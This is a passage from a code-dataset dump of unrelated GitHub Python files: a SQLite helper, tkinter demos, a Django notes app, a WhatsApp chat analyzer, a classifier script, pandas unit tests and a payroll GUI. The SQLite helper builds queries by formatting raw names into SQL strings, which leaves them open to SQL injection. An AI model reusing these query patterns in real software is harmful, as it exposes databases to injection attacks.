c.fetchone()\n while row != None:\n items.append(row[0])\n row = c.fetchone()\n return items\n\ndef filter_items(pattern):\n global conn\n global c\n\n c.execute('''\n SELECT name FROM items\n WHERE name LIKE '%{}%' OR descript LIKE '%{}%'\n '''.format(pattern, pattern))\n\n names = list()\n row = c.fetchone()\n while row != None:\n names.append(row[0])\n row = c.fetchone()\n return names\n\ndef list_depends():\n global conn\n global c\n\n c.execute(\"SELECT name, depend_name FROM depends\")\n\n depends = list()\n row = c.fetchone()\n while row != None:\n depends.append((row[0], row[1]))\n row = c.fetchone()\n return depends\n\ndef get_item(name):\n global conn\n global c\n\n item = dict()\n depends = list()\n items = list()\n\n c.execute('''\n SELECT bunch, descript FROM items\n WHERE name='{}'\n '''.format(name))\n row = c.fetchone()\n assert row != None and c.fetchone() == None\n item['name'] = name\n item['bunch'] = row[0]\n item['descript'] = row[1]\n\n c.execute('''\n SELECT depend_name, depend_bunch FROM depends\n WHERE name='{}'\n '''.format(name))\n row = c.fetchone()\n while row != None:\n depends.append((row[0], row[1]))\n row = c.fetchone()\n\n c.execute('''\n SELECT name FROM depends\n WHERE depend_name='{}'\n '''.format(name))\n row = c.fetchone()\n while row != None:\n items.append(row[0])\n row = c.fetchone()\n\n return item, depends, items\n","repo_name":"haozhigh/py_utilities","sub_path":"alchemy_helper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5250281143","text":"# tkinter : GUI module\n\nfrom tkinter import *\n\nwindow = Tk() # window 창 생성 \ncanvas = Canvas(window, height = 1000, width = 1000, bg = 'white') # Window 창 안에 도화지 생성 \ncanvas.pack()\n\ncx = 1000//2 # Center X\ncy = 1000//2 # Center Y\nr = 400\n\ncanvas.create_oval(cx-r, cy-r, cx+r, cy+r, width =2, outline=\"red\")\n\nwindow.mainloop() # window 창 생성 -> loop라는 건 아마 OpenCV의 imshow 처럼 계속 띄워놓기 위함일 것 \n\n\n","repo_name":"dldnxks12/Algorithm","sub_path":"Algorithm/Recursive/Circle_tkinter.py","file_name":"Circle_tkinter.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1247588042","text":"def mirror_num(n):\n new_n = 0\n while n > 0:\n rem = n%10\n new_n = (new_n*10) + rem\n n = n//10\n return new_n\n\ndef beautifulDays(i, j, k):\n count = 0\n for day in range(i, j+1):\n if abs(day - mirror_num(day))%k == 0:\n count += 1\n else:\n continue\n return count \n\nif __name__ == \"__main__\":\n i = int(input())\n j = int(input())\n k = int(input())\n print(beautifulDays(i, j, k))","repo_name":"Somenath95/hackerrank_practice","sub_path":"ex_12_beautiful_day.py","file_name":"ex_12_beautiful_day.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16859336517","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .models import Note\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserCreationForm,NoteForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import authenticate,login as loginUser,logout as logoutUser\n\n# Create your views here.\n\n@login_required(login_url='about')\ndef index(request):\n user = request.user\n notes = Note.objects.filter(user = user)\n\n context ={\"notes\":notes}\n return render(request,'notes/index.html',context)\n\n@login_required(login_url='login')\ndef add_note(request):\n user = request.user\n form = NoteForm()\n if request.method == 'POST':\n form = NoteForm(request.POST)\n if form.is_valid():\n note = form.save(commit=False)\n note.user = user\n note.save()\n return redirect('/')\n context ={\"form\":form}\n return render(request,'notes/add_note.html',context)\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('/')\n form = AuthenticationForm()\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n # print(user)\n if user is not None:\n loginUser(request, user)\n return redirect('/')\n else:\n messages.add_message(request,'Username or Password is incorrect')\n # else:\n # form = AuthenticationForm()\n context = {\"form\":form}\n return render(request,'notes/login.html',context)\n\ndef signup(request):\n if request.user.is_authenticated:\n return redirect('/')\n form = UserCreationForm()\n if request.method == 'POST': \n # print(request.POST)\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n if user is not None:\n return redirect('login')\n context ={\"form\": form}\n return render(request,'notes/signup.html',context)\n\n@login_required(login_url='login')\ndef logout(request):\n logoutUser(request)\n return redirect('login')\n\n@login_required(login_url='login')\ndef edit_note(request,pk):\n note = Note.objects.get(id=pk)\n if note.user!=request.user:\n return redirect('access_error') \n form = NoteForm(instance=note)\n if request.method == 'POST':\n form = NoteForm(request.POST,instance=note)\n if form.is_valid():\n form.save()\n return redirect('/')\n context ={\"form\": form,\"note\":note}\n return render(request,'notes/edit_note.html',context)\n\n@login_required(login_url='login')\ndef delete_note(request,pk):\n note = Note.objects.get(id=pk)\n if note.user!=request.user:\n return redirect('access_error')\n if request.method == 'POST':\n note.delete()\n return redirect('/')\n context ={\"note\":note}\n return render(request,'notes/delete_note.html',context)\n\ndef about(request):\n return render(request,'notes/about.html')\n\ndef access_error(request):\n return render(request,'notes/no_access.html')","repo_name":"VishwasGajawada/Color_notes","sub_path":"notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5040167842","text":"from django.shortcuts import render\nfrom django.db import connection,transaction\n\n# Create your views here.\n\n\ndef index(request):\n return render(request,'facultyapp/index.html')\n\ndef home(request):\n with connection.cursor() as cursor:\n query1 = '''SELECT * FROM course;'''\n\n try:\n cursor.execute(query1)\n results = cursor.fetchall()\n rows = []\n columns = [each[0] for each in cursor.description]\n print(columns)\n for result in results:\n row = dict(zip(columns,result))\n rows.append(row)\n print(rows)\n return render(request,'departmentapp/home.html',{'results':rows})\n\n except Exception as e:\n print('Couldnt fetch data due to error ... '+ str(e))\n\n # query2 = '''SELECT * FROM academic WHERE staff_id='%s' '''%('9999')\n #\n # cursor.execute(query2)\n # results = cursor.fetchall()\n # print(results)\n # for result in results:\n # print(result==None)\n","repo_name":"dotel-saramsz/DepartmentDatabase","sub_path":"departmentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17759421205","text":"from urlextract import URLExtract\nfrom wordcloud import WordCloud\nfrom collections import Counter\nimport pandas as pd\nimport emoji\nextract = URLExtract()\ndef fetch_stats(selected_user,df):\n # 1. fetch number of messages\n # 2. number of words\n if selected_user != \"Overall\":\n df = df[df['user'] == selected_user]\n\n num_messages = df.shape[0]\n words = []\n links = []\n for message in df['message']:\n words.extend(message.split())\n links.extend(extract.find_urls(message))\n\n num_media_messages = df[df['message'] == '<Media omitted>\\n'].shape[0]\n return num_messages, len(words), num_media_messages, len(links)\n\ndef fetchMostBusy(df):\n x = df['user'].value_counts().head()\n df = round(df['user'].value_counts()/df.shape[0]*100,2).reset_index().rename(columns={'user':'Name','count':'Percentage'})\n\n return x,df\n\ndef create_wordcloud(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n wc = WordCloud(width=500, height=500, min_font_size=10,background_color='white')\n df_wc = wc.generate(df['message'].str.cat(sep=\" \"))\n\n return df_wc\n\ndef mostCommonWord(selected_user,df):\n F = open('stop_hinglish.txt', 'r', encoding='utf-8')\n d = F.read()\n stop_words = []\n for word in d.split(\"\\n\"):\n stop_words.append(word)\n\n df = df[df['user'] != 'group_notification']\n df = df[df['message'] != '<Media omitted>\\n']\n\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n list = []\n\n for message in df['message']:\n for words in message.lower().split():\n if words not in stop_words:\n list.append(words)\n\n most_common_df = pd.DataFrame(Counter(list).most_common(20))\n\n return most_common_df\n\ndef emoji_helper(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user']==selected_user]\n emojis = []\n\n for message in df['message']:\n for word in message:\n if emoji.emoji_count(word):\n emojis.append(word)\n\n emoji_df = pd.DataFrame(Counter(emojis).most_common(len(emojis)))\n return emoji_df\n\ndef monthly_timeline(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user']==selected_user]\n timeline = df.groupby(['year', 'month']).count()['message'].reset_index()\n time = []\n for i in range(len(timeline)):\n time.append(timeline['month'][i] + \"-\" + str(timeline['year'][i]))\n\n timeline['time'] = time\n\n return timeline\ndef daily_timeline(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n df['only_date'] = df['date'].dt.date\n d_timeline = df.groupby(['only_date']).count()['message'].reset_index()\n\n return d_timeline\n\ndef weekly_activity_analysis(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n df['day_name'] = df['date'].dt.day_name()\n return df.groupby(['day_name']).count()['message'].reset_index()\n\ndef monthly_activity_analysis(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n return df.groupby(['month']).count()['message'].reset_index()\n\ndef activity_heatmap(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n user_heatmap = df.pivot_table(index='day_name',columns='period',values='message',aggfunc='count').fillna(0)\n\n return user_heatmap\n\n","repo_name":"Ayush-13-02/WhatsApp-Chat-Analyzer","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21408925379","text":"##\n## Generative Model\n##\nimport numpy as np\nfrom numpy import linalg\ndef pre_process():\n train_data = np.loadtxt('./data/spam_train.csv', delimiter=',', dtype=float)\n train_data = train_data[:,1:]\n x = train_data[:, :-1]\n y = train_data[:, -1]\n return x,y\n\ndef train(x, y):\n x = np.transpose(x)\n #数据总数\n num = y.shape[0]\n\n n1 = 0 # $==1\n n2 = 0 # $==0\n u1 = np.zeros(57).reshape(57,1)\n u2 = np.zeros(57).reshape(57,1)\n m1 = np.zeros(57 * 57).reshape(57, 57)\n m2 = np.zeros(57 * 57).reshape(57, 57)\n\n #计算n1 和 n2\n for i in range(num):\n if y[i] == 1:\n n1 += 1\n u1 += x[:,i].reshape(57,1)\n else:\n n2 += 1\n u2 += x[:,i].reshape(57,1)\n u1 /= n1\n u2 /= n2\n #计算sigma\n for i in range(num):\n if y[i] == 1:\n #np.tranpose() == x.T 求转置\n m1 += np.dot((x[:,i].reshape(57,1) - u1), (x[:,i].reshape(57,1) - u1).T)\n else:\n m2 += np.dot((x[:,i].reshape(57,1) - u2), (x[:,i].reshape(57,1) - u2).T)\n m1 /= n1\n m2 /= n2\n\n m = (m1 * (float(n1)/(n1 + n2)) + m2 * (float(n1)/(n1 + n2)))\n m_inv = linalg.inv(m)\n # print('n1=%d, n2=%d'%(n1, n2))\n # np.dot 与 np.matmul相似 均为矩阵乘法\n w = np.dot((u1 - u2).T, linalg.inv(m))\n b = - 0.5 * np.dot(np.dot(u1.T, m_inv), u1) \\\n + 0.5 * np.dot(np.dot(u2.T, m_inv), u2) + np.log(float(n1) / n2)\n\n return w,b\n\ndef sigmoid(z):\n return 1.0 / (1.0 + np.exp(-z))\n\ndef validate(w, b):\n acc = 0\n num = y_val.shape[0]\n result = np.zeros(num)\n z = np.dot(w, x_val.T) + b\n f = sigmoid(z)\n for i in range(num):\n result[i] = np.round(f[0,i])\n if result[i] == y_val[i]:\n acc += 1.0\n return acc / num\n\nx, y = pre_process()\nTRAIN_SIZE = 3600\nx_train = x[:TRAIN_SIZE, :]\ny_train = y[:TRAIN_SIZE]\nx_val = x[TRAIN_SIZE:, :]\ny_val = y[TRAIN_SIZE:]\nw,b = train(x_train, y_train)\nprint(validate(w, b))","repo_name":"YangLuYang/ML_hw","sub_path":"hw2_GM.py","file_name":"hw2_GM.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8972592851","text":"import unittest\nimport pandas as pd\nimport numpy as np\nfrom pystats.compounding import _get_cum_prod_to_last_date, \\\n _adjust_cum_prod_by_duration, _get_annualised_conts, get_compound_conts_to_pfo_annualised, \\\n remove_undefined_contributions\nfrom pystats.compounding import CompoundingTime\nfrom pystats.constants import TimePeriods as tp\nfrom unittest import mock\n\n\nclass TestCompounding(unittest.TestCase):\n def test_get_compounding_dates(self):\n date_1 = pd.datetime(2017, 12, 31)\n date_2 = pd.datetime(2016, 12, 31)\n date_3 = pd.datetime(2017, 5, 15)\n date_4 = pd.datetime(2017, 6, 30)\n date_5 = pd.datetime(2018, 1, 20)\n\n ct = CompoundingTime()\n ct_2 = CompoundingTime(optional_dates={tp.SCA_INCEPTION: date_4})\n\n res_1 = ct.get_compounding_dates(date_1, date_2)\n res_2 = ct.get_compounding_dates(date_3, date_2)\n res_3 = ct.get_compounding_dates(date_2, date_3)\n res_4 = ct.get_compounding_dates(date_2, date_2)\n res_5 = ct.get_compounding_dates(date_4, date_4)\n res_6 = ct_2.get_compounding_dates(date_1, date_2)\n res_7 = ct.get_compounding_dates(date_5, date_1)\n\n ans_1 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 12, 31),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 10, 31),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 10, 31),\n tp.TWELVE_MONTHS: pd.Timestamp(2017, 1, 31)})\n\n ans_2 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 5, 15),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 4, 30),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 3, 31)})\n\n ans_3 = dict()\n\n ans_4 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2016, 12, 31)})\n\n ans_5 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 6, 30)})\n\n ans_6 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 12, 31),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 10, 31),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 10, 31),\n tp.TWELVE_MONTHS: pd.Timestamp(2017, 1, 31),\n tp.SCA_INCEPTION: pd.Timestamp(2017, 6, 30)})\n\n ans_7 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2018, 1, 20),\n tp.QUARTER_TO_DATE: pd.Timestamp(2018, 1, 20),\n tp.YEAR_TO_DATE: pd.Timestamp(2018, 1, 20)})\n\n self.assertEqual(res_1, ans_1)\n self.assertEqual(res_2, ans_2)\n self.assertEqual(res_3, ans_3)\n self.assertEqual(res_4, ans_4)\n self.assertEqual(res_5, ans_5)\n self.assertEqual(res_6, ans_6)\n self.assertEqual(res_7, ans_7)\n\n def test_get_cum_prod_to_last_date(self):\n df_1 = pd.DataFrame(np.array([[1, 2, 3]] * 3).T)\n df_2 = pd.DataFrame(np.array([[1, 2, 3, 4]]))\n df_3 = pd.DataFrame(np.array([1, 2, 3, 4]).T)\n df_4 = pd.DataFrame(np.array([[1, 1], [1, 0]]))\n\n res_1 = _get_cum_prod_to_last_date(df_1)\n res_2 = _get_cum_prod_to_last_date(df_2)\n res_3 = _get_cum_prod_to_last_date(df_3)\n\n ans_1 = pd.DataFrame(np.array([[6, 3, 1]] * 3).T)\n ans_2 = pd.DataFrame(np.array([[1, 1, 1, 1]]))\n ans_3 = pd.DataFrame(np.array([24, 12, 4, 1]))\n\n np.testing.assert_array_equal(res_1, ans_1)\n np.testing.assert_array_equal(res_2, ans_2)\n np.testing.assert_array_equal(res_3, ans_3)\n\n self.assertRaises(ValueError, _get_cum_prod_to_last_date, df_4)\n\n def test_adjust_cum_prod_by_duration(self):\n start_date = pd.datetime(2017, 5, 31)\n mid_date = pd.datetime(2017, 12, 31)\n end_date = pd.datetime(2018, 4, 30)\n\n ct = CompoundingTime({tp.SCA_INCEPTION: pd.datetime(2017, 6, 30)})\n\n dates_1 = ct.get_compounding_dates(end_date, start_date)\n dates_2 = ct.get_compounding_dates(end_date, mid_date)\n dates_3 = ct.get_compounding_dates(mid_date, start_date)\n\n res_rng_1 = np.vstack(\n [[1.039046, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.9797, 1.01, 1.01, 1.01, 1]] * 6).T\n res_rng_2 = res_rng_1[-5:, :4]\n res_rng_3 = res_rng_1[:8, :4] / 0.9797\n\n res_df_1 = pd.DataFrame(res_rng_1, columns=dates_1.keys(),\n index=pd.date_range(start=start_date, end=end_date, freq='M'))\n res_df_2 = pd.DataFrame(res_rng_2, columns=dates_2.keys(),\n index=pd.date_range(start=mid_date, end=end_date, freq='M'))\n res_df_3 = pd.DataFrame(res_rng_3, columns=dates_3.keys(),\n index=pd.date_range(start=start_date, end=mid_date, freq='M'))\n\n res_1 = _adjust_cum_prod_by_duration(res_df_1, dates_1)\n res_2 = _adjust_cum_prod_by_duration(res_df_2, dates_2)\n res_3 = _adjust_cum_prod_by_duration(res_df_3, dates_3)\n\n ans_rng_1 = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 1.01, 1.01, 1.01, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 1.01, 1.01, 1],\n [1.039046, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.979700, 1.01,\n 1.01, 1.01, 1],\n [0, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.979700, 1.01, 1.01,\n 1.01, 1]])\n\n ans_rng_2 = np.array([[0, 0, 0, 0, 1],\n [0, 0, 0, 0, 1],\n [0, 1.01, 1.01, 1.01, 1],\n [0, 0, 1.01, 1.01, 1]])\n\n ans_rng_3 = np.array([[0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 1.009400, 0.98, 1],\n [0, 0, 0, 0, 0, 1.009400, 0.98, 1],\n [0, 1.050075, 1.060682, 1.039884, 1.029588, 1.009400, 0.98, 1]])\n\n ans_1 = pd.DataFrame(ans_rng_1.T, columns=dates_1.keys(),\n index=pd.date_range(start=start_date, end=end_date, freq='M'))\n ans_2 = pd.DataFrame(ans_rng_2.T, columns=dates_2.keys(),\n index=pd.date_range(start=mid_date, end=end_date, freq='M'))\n ans_3 = pd.DataFrame(ans_rng_3.T, columns=dates_3.keys(),\n index=pd.date_range(start=start_date, end=mid_date, freq='M'))\n\n np.testing.assert_array_almost_equal(res_1, ans_1, decimal=6)\n np.testing.assert_array_almost_equal(res_2, ans_2, decimal=6)\n np.testing.assert_array_almost_equal(res_3, ans_3, decimal=6)\n\n def test_compound_contribution_to_portfolio(self):\n # set up portfolio with 5 month history of three assets,\n # where thesis_3 only enters the portfolio in the\n # third month\n\n start_date = pd.datetime(2017, 10, 31)\n end_date = pd.datetime(2018, 2, 15)\n dates = list(pd.date_range(start_date, end_date, freq='M'))\n dates.append(pd.datetime(2018, 2, 15))\n\n sca_inception_date = pd.datetime(2017, 12, 31)\n portfolio_inception_date = pd.datetime(2017, 10, 31)\n\n input_dict = {'thesis_1': [0.01] * 5,\n 'thesis_2': [0.01, -0.01, 0.01, 0.01, 0.01],\n 'thesis_3': [0, 0, 0.02, 0.02, 0.01]}\n\n input_df = pd.DataFrame(input_dict, index=dates)\n\n optional_dates = {tp.SCA_INCEPTION: sca_inception_date,\n tp.PORTFOLIO_INCEPTION: portfolio_inception_date}\n result = get_compound_conts_to_pfo_annualised(input_df, optional_dates, None)\n\n # set up expected result\n\n expected_index = ['thesis_1'] * 5 + ['thesis_2'] * 5 + ['thesis_3'] * 5\n\n expected_dict = {tp.DATE_NAME: dates[::-1] * 3,\n tp.MONTH_TO_DATE: [0.01] * 5 + [0.01, 0.01, 0.01, -0.01, 0.01] + [0.01, 0.02, 0.02, 0, 0],\n tp.QUARTER_TO_DATE: [0.0203, 0.01, 0.0308, 0.02, 0.01] + [0.0203, 0.01, 0.01, 0, 0.01] +\n [0.0306, 0.02, 0.02, 0, 0],\n tp.YEAR_TO_DATE: [0.0203, 0.01, None, None, None] + [0.0203, 0.01, None, None, None]\n + [0.0306, 0.02, None, None, None],\n tp.THREE_MONTHS: [0.03101, 0.03122, 0.0308, None, None] + [0.03101, 0.00958, 0.01, None, None]\n + [0.05202, 0.0408, 0.02, None, None],\n tp.SCA_INCEPTION: [0.03101, 0.0204, 0.01, None, None] + [0.03101, 0.0204, 0.01, None, None]\n + [0.05202, 0.0408, 0.02, None, None],\n tp.PORTFOLIO_INCEPTION: [0.05329, 0.04203, 0.0308, 0.02, 0.01] + [0.03101, 0.0204, 0.01, 0,\n 0.01] + [0.05202, 0.0408, 0.02, 0, 0]}\n\n expected_df = pd.DataFrame(expected_dict, index=expected_index)\n expected_df = expected_df[[tp.DATE_NAME, tp.THREE_MONTHS, tp.MONTH_TO_DATE, tp.PORTFOLIO_INCEPTION,\n tp.QUARTER_TO_DATE, tp.SCA_INCEPTION, tp.YEAR_TO_DATE]]\n\n # sort so that both in same order for comparison\n\n expected_df = expected_df.set_index(tp.DATE_NAME, append=True).sort_index(axis=0).reset_index(level=1)\n result = result.set_index(tp.DATE_NAME, append=True).sort_index(axis=0).reset_index(level=1)\n\n pd.testing.assert_frame_equal(expected_df, result, check_less_precise=True)\n\n def test_get_annualised_optional(self):\n # set up compounded returns from\n # end march 17 and annualise\n\n start_date = pd.datetime(2017, 1, 31)\n dates = pd.date_range(start_date, periods=18, freq='M')\n\n ct = CompoundingTime({'test_date': pd.datetime(2017, 3, 31)})\n\n test_dict = {tp.DATE_NAME: dates,\n 'test_date': [None] * 2 + [0.01 * s for s in range(1, 17)]}\n\n test_df = pd.DataFrame(test_dict)\n\n result = _get_annualised_conts(test_df, ct)\n\n expected_dict = {tp.DATE_NAME: dates,\n 'test_date': [None] * 2 + [0.01 * s for s in range(1, 13)]\n + [0.11943, 0.11886, 0.11830, 0.11775]}\n expected_df = pd.DataFrame(expected_dict)\n\n pd.testing.assert_frame_equal(result, expected_df, check_less_precise=4)\n\n def test_get_annualised_fixed(self):\n # set up a series of 3 year\n # returns which need to be annualised\n\n start_date = pd.datetime(2018, 1, 1)\n dates = pd.date_range(start_date, periods=5, freq='M')\n\n ct = CompoundingTime()\n three_yr_ann = {'three yrs': 36}\n ct.get_fixed_annualisations = mock.MagicMock(return_value=three_yr_ann)\n\n test_dict = {tp.DATE_NAME: dates,\n 'three yrs': [None, 0.1, -0.08, -0.04, 0]}\n test_df = pd.DataFrame(test_dict)\n\n result = _get_annualised_conts(test_df, ct)\n\n expected_dict = {tp.DATE_NAME: dates,\n 'three yrs': [None, 0.03228, -0.02741, -0.013515, 0]}\n expected_df = pd.DataFrame(expected_dict)\n\n pd.testing.assert_frame_equal(result, expected_df, check_less_precise=4)\n\n def test_remove_undefined_contributions(self):\n # arrange\n\n test_dict = {\"Dates\": [pd.datetime(2018, 1, 31)] * 5 +\n [pd.datetime(2018, 2, 28)] * 5,\n \"Instrument\": [\"instr_\" + str(i) for i in range(5)] * 2,\n \"Performance\": [None, 0.02, None, 0.01, None] +\n [0, 0.01, 0.02, 0.01, 0.02]}\n test_df = pd.DataFrame(test_dict)\n\n expected_dict = {\"Dates\": [pd.datetime(2018, 1, 31)] * 2 +\n [pd.datetime(2018, 2, 28)] * 4,\n \"Instrument\": [\"instr_1\", \"instr_3\"] +\n [\"instr_1\", \"instr_2\", \"instr_3\", \"instr_4\"],\n \"Performance\": [0.02, 0.01] + [0.01, 0.02, 0.01, 0.02]}\n expected_df = pd.DataFrame(expected_dict)\n\n # act\n\n result = remove_undefined_contributions(test_df, \"Performance\")\n\n # assert\n\n expected_df = expected_df[result.columns] # reorder for comparison\n result = result.reset_index(drop=True) # reset index for comparison\n pd.testing.assert_frame_equal(expected_df, result)\n","repo_name":"jennyzzw240/sdk-pystats","sub_path":"tests/test_compounding.py","file_name":"test_compounding.py","file_ext":"py","file_size_in_byte":12490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19909099737","text":"from tkinter import Tk, Label, Button, Entry, END\n\nemployees = []\n\nclass Employee:\n\tdef __init__(self, empno, name, addr, hwage, hworked):\n\t\tself.empno = empno\n\t\tself.name = name\n\t\tself.addr = addr\n\t\tself.hwage = hwage\n\t\tself.hworked = hworked\n\n\tdef calc_salary(self):\n\t\tself.gpay = float(self.hwage) * float(self.hworked)\n\t\tself.netpay = self.gpay - self.gpay * 0.20 - self.gpay * 0.075\n\t\treturn self.netpay\n\nclass MyFirstGUI:\n\tdef __init__(self, master):\n\t\tself.cnt = 0\n\t\tself.master = master\n\t\tmaster.title(\"Fluff Shuffle Electronics\")\n\n\t\tself.lEmpNo = Label(master, text=\"Emp Number: \")\n\t\tself.txtEmpNo = Entry(master, validate=\"key\", text=\"Hello\")\n\t\tself.lName = Label(master, text=\"Name: \")\n\t\tself.txtName = Entry(master, validate=\"key\")\n\t\tself.lAddr = Label(master, text=\"Address: \")\n\t\tself.txtAddr = Entry(master, validate=\"key\")\n\t\tself.lhw = Label(master, text=\"Hourly Wage: \")\n\t\tself.txthw = Entry(master, validate=\"key\")\n\t\tself.lhwkd = Label(master, text=\"Hours Worked: \")\n\t\tself.txthwkd = Entry(master, validate=\"key\")\n\t\tself.lNetpay = Label(master, text=\"Net Pay: \")\n\t\tself.txtNetpay = Entry(master, validate=\"key\")\n\n\t\tself.btnNext = Button(master, text=\"Next Employee\", command=lambda: self.update(\"next\"))\n\t\tself.btnClose = Button(master, text=\"Close\", command=master.quit)\n\n\t\tself.lEmpNo.grid(row=0, column=0)\n\t\tself.txtEmpNo.grid(row=0, column=1)\n\t\tself.lName.grid(row=1, column=0)\n\t\tself.txtName.grid(row=1, column=1)\n\t\tself.lAddr.grid(row=2, column=0)\n\t\tself.txtAddr.grid(row=2, column=1)\n\t\tself.lhw.grid(row=3, column=0)\n\t\tself.txthw.grid(row=3, column=1)\n\t\tself.lhwkd.grid(row=4, column=0)\n\t\tself.txthwkd.grid(row=4, column=1)\n\t\tself.lNetpay.grid(row=5, column=0)\n\t\tself.txtNetpay.grid(row=5, column=1)\n\t\tself.btnNext.grid(row=6, column=0)\n\t\tself.btnClose.grid(row=6, column=1)\n\n\t\tself.update(\"next\")\n\n\tdef greet(self):\n\t\tprint(\"Greetings!\")\n\n\tdef update(self, method):\n\t\tif method == \"next\":\n\t\t\tprint(employees[self.cnt].name)\n\t\t\temp = employees[self.cnt]\n\t\t\tself.txtEmpNo.delete(0, END)\n\t\t\tself.txtEmpNo.insert(0, emp.empno)\n\t\t\tself.txtName.delete(0, END)\n\t\t\tself.txtName.insert(0, emp.name)\n\t\t\tself.txtAddr.delete(0, END)\n\t\t\tself.txtAddr.insert(0, emp.addr)\n\t\t\tself.txthw.delete(0, END)\n\t\t\tself.txthw.insert(0, emp.hwage)\n\t\t\tself.txthwkd.delete(0, END)\n\t\t\tself.txthwkd.insert(0, emp.hworked)\n\t\t\tself.txtNetpay.delete(0, END)\n\t\t\tself.txtNetpay.insert(0, emp.calc_salary())\n\t\t\tself.cnt += 1\n\t\t\tself.cnt = self.cnt % len(employees)\n\nif __name__ == \"__main__\":\n\tfile_ref = open(\"emp-payroll-data.txt\", 'r')\n\tline = file_ref.readline()\n\twhile line:\n\t\tline = line.strip('\\n')\n\t\temp_data = line.split(',')\n\t\tprint(emp_data)\n\t\temp = Employee(emp_data[0], emp_data[1], emp_data[2], emp_data[3], emp_data[4])\n\t\temployees.append(emp)\n\t\tline = file_ref.readline()\n\troot = Tk()\n\tmy_gui = MyFirstGUI(root)\n\troot.mainloop()\n","repo_name":"bharathpgp/chegg","sub_path":"python/emp-payroll.py","file_name":"emp-payroll.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"4282558865","text":"import threading\nimport time\n\nfrom functools import wraps\nfrom trashguy import TrashGuy\n\n\nclass Anim:\n def __init__(self, text: str = 'Loading', speed: int = 0.2):\n self.text: str = text\n self.speed: int = speed\n\n self.thread: threading.Thread = threading.Thread()\n self.trash_anim: TrashGuy = TrashGuy(self.text)\n self.frame_list: list = list(self.trash_anim)\n\n self.animate: bool = True\n\n def _start(self):\n for frame in self.frame_list:\n if self.animate:\n print(frame, end='', flush=True)\n time.sleep(self.speed)\n print(f'\\x1b[1K\\x1b[{len(frame) ** 2}D',\n end='')\n self.frame_list.pop(0)\n else:\n continue\n return\n\n def _get_last_frame(self):\n return self.frame_list[0] if len(self.frame_list) != 0 else []\n\n def start(self):\n self.thread = threading.Thread(target=self._start)\n self.thread.start()\n return\n\n def stop(self):\n self.animate = False\n return\n\ndef animate(text: str = 'LOADING', speed: int = 0.02):\n \"\"\"Decorator for adding trashguy animation to long running\n functions.\n Args:\n text (str): String reference to trash items\n speed (float): Number of seconds each cycle of animation.\n\n Examples:\n import trash_anim\n\n @trash.anim.animate(text='LOADING', speed=1)\n def test():\n import time\n time.sleep(10)\n print('\\nDone')\n \"\"\"\n def decorator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n anim = Anim(text=text, speed=speed)\n anim.start()\n try:\n ret = func(*args, **kwargs)\n 